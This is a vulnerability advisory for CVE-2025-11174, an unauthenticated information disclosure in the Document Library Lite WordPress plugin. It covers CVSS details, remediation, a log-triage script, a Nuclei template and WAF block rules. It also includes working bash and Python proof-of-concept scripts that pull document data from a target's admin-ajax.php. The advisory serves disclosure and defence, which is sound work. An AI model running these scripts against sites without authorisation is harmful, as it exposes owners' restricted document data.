- Overview
- Vulnerability Details
- Technical Analysis
- Attack Vector
- Proof of Concept
- Remediation Guide
- Detection
- CVSS Metrics
- References
- Credits
- Security Contact
Document Library Lite WordPress Plugin Information Disclosure Vulnerability (CVE-2025-11174) - Security flaw allowing unauthenticated access to sensitive document data in WordPress document library plugin.
A critical authorization bypass vulnerability was discovered in the Document Library Lite WordPress Plugin that allows unauthenticated attackers to access sensitive document information without proper authentication.
Discovered by: Kai Aizen & Avraham Shemesh (SnailSploit)
Published: November 1, 2025
CVSS Score: 5.3 (Medium)
CWE: CWE-862 - Missing Authorization
Plugin: Document Library Lite
Vendor: Barn2 Plugins
Attack Type: Unauthenticated Information Disclosure
Required Privileges: None (Unauthenticated Attack)
The Document Library Lite plugin for WordPress contains an improper authorization vulnerability in all versions up to and including 1.1.6. The plugin exposes an unauthenticated AJAX action `dll_load_posts` which returns a JSON table of document data without performing nonce or capability checks.
This vulnerability allows unauthenticated attackers to:
- Access document metadata without authorization
- Retrieve document listings that should be restricted
- View document information intended for authenticated users only
- Enumerate documents stored in the Document Library
Note: The CVSS score of 5.3 (Medium severity) reflects limited information disclosure. While the vulnerability allows unauthenticated access to document data, the impact is rated as Low for confidentiality with no integrity or availability impact.
- Vulnerable: All versions ≤ 1.1.6
- Patched: Version 1.1.7 and above
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
| Metric | Value |
|---|---|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | None (PR:N) |
| User Interaction | None (UI:N) |
| Scope | Unchanged (S:U) |
| Confidentiality | Low (C:L) |
| Integrity | None (I:N) |
| Availability | None (A:N) |
CVSS v3.1 Breakdown:
- Attack Vector (AV): Network - The vulnerability can be exploited remotely over a network
- Attack Complexity (AC): Low - No special conditions are required for exploitation
- Privileges Required (PR): None - No authentication or privileges are required
- User Interaction (UI): None - The exploit works without any user interaction
- Scope (S): Unchanged - The vulnerability only affects the vulnerable component
- Confidentiality Impact (C): Low - Limited information disclosure
- Integrity Impact (I): None - No integrity impact
- Availability Impact (A): None - No availability impact
The AJAX action `dll_load_posts` is registered without proper authentication or authorization checks:

```php
// Vulnerable code pattern (simplified)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
```

The `wp_ajax_nopriv_` prefix indicates this action is accessible to non-authenticated users, and the callback function does not implement:
- Nonce verification
- Capability checks
- User authentication validation
```http
POST /wp-admin/admin-ajax.php
action=dll_load_posts
```

The vulnerability can be exploited through the WordPress `admin-ajax.php` endpoint without authentication.
```bash
#!/bin/bash
# CVE-2025-11174 PoC
TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "action=dll_load_posts" \
    | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"
```

```python
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""
import requests
import sys
import json


def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")

    data = {'action': 'dll_load_posts'}

    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit(target)
```

Immediate Action Required:
- Update to Document Library Lite version 1.1.7 or later immediately
- Review your site's access logs for suspicious POST requests to `admin-ajax.php` with `action=dll_load_posts`
- If you cannot update immediately, consider temporarily disabling the plugin
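
The access-log review suggested above, sketched as an added example (not part of the original advisory or the plugin's code). Standard "combined" access logs do not record POST bodies, so only requests carrying `action=dll_load_posts` in the query string can be confirmed; the second bucket is a heuristic assumed here (a POST to `admin-ajax.php` with no query-string action, status 200 and no referer). The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Nov/2025:10:01:11 +0000] "POST /wp-admin/admin-ajax.php?action=dll_load_posts HTTP/1.1" 200 5120 "-" "curl/8.5.0"
203.0.113.7 - - [02/Nov/2025:10:01:15 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5093 "-" "python-requests/2.32"
198.51.100.4 - - [02/Nov/2025:10:02:40 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "https://site.example/wp-admin/post.php" "Mozilla/5.0"
198.51.100.9 - - [02/Nov/2025:10:03:02 +0000] "GET /documents/ HTTP/1.1" 200 18231 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def triage(log_text):
    """Split admin-ajax.php hits into (confirmed, review) lists of parsed entries."""
    confirmed, review = [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        entry = m.groupdict()
        url = urlsplit(entry["target"])
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        actions = parse_qs(url.query).get("action", [])
        if "dll_load_posts" in actions:
            # Action is visible in the query string: a direct match.
            confirmed.append(entry)
        elif (entry["method"] == "POST" and not actions
              and entry["status"] == "200" and entry["referer"] in ("", "-")):
            # Action was sent in the body, which this log format does not record.
            # Heuristic only: correlate with WAF/audit logs that capture bodies.
            review.append(entry)
    return confirmed, review


if __name__ == "__main__":
    hits, maybe = triage(SAMPLE_LOG)
    for label, rows in (("CONFIRMED", hits), ("REVIEW", maybe)):
        for r in rows:
            print(label, r["ts"], r["ip"], r["target"], r["ua"])
```
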
Via WordPress Admin:
- Navigate to Plugins > Installed Plugins in WordPress admin
- Locate "Document Library Lite"
- Click Update Now to upgrade to version 1.1.7 or later
- Verify the update was successful
Using WP-CLI:
```bash
wp plugin update document-library-lite
```

Ensure all AJAX handlers implement proper security controls:

```php
// Example of proper AJAX security
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Verify nonce (a missing nonce is rejected the same way as an invalid one)
    if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('Invalid nonce');
    }

    // Check capabilities
    if (!current_user_can('read')) {
        wp_send_json_error('Insufficient permissions');
        wp_die();
    }

    // Your secure code here
}
```

```bash
# Check if vulnerable version is installed
wp plugin list | grep -i "document-library-lite"
```

Nuclei Template:
```yaml
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    # Form content type so PHP parses the body into $_POST
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "action=dll_load_posts"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      - type: status
        status:
          - 200
```

ModSecurity Rule:
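```apache
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"
```

Nginx/OpenResty Rule:

```nginx
# nginx does not allow nested "if" blocks; $request_uri already contains
# the query string, so a single test covers both conditions.
# This only matches an action passed in the query string: nginx does not
# inspect the POST body, so body-based requests need the WAF rule above.
if ($request_uri ~* "admin-ajax\.php.*action=dll_load_posts") {
    return 403;
}
```

- November 1, 2025 - Vulnerability publicly disclosed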
- November 1, 2025 - CVE record published
- November 2025 - Patch released (version 1.1.7)
Researchers:
Disclosure Process: Coordinated disclosure
This information is provided for security research and defensive purposes only. Any exploitation of this vulnerability for malicious purposes is illegal and unethical. Always obtain proper authorization before testing systems you do not own.
For questions or additional information about this vulnerability:
- Email: kai@owasp.com
- Website: snailsploit.com
- Organization: SnailSploit Security Research
Last updated: November 2, 2025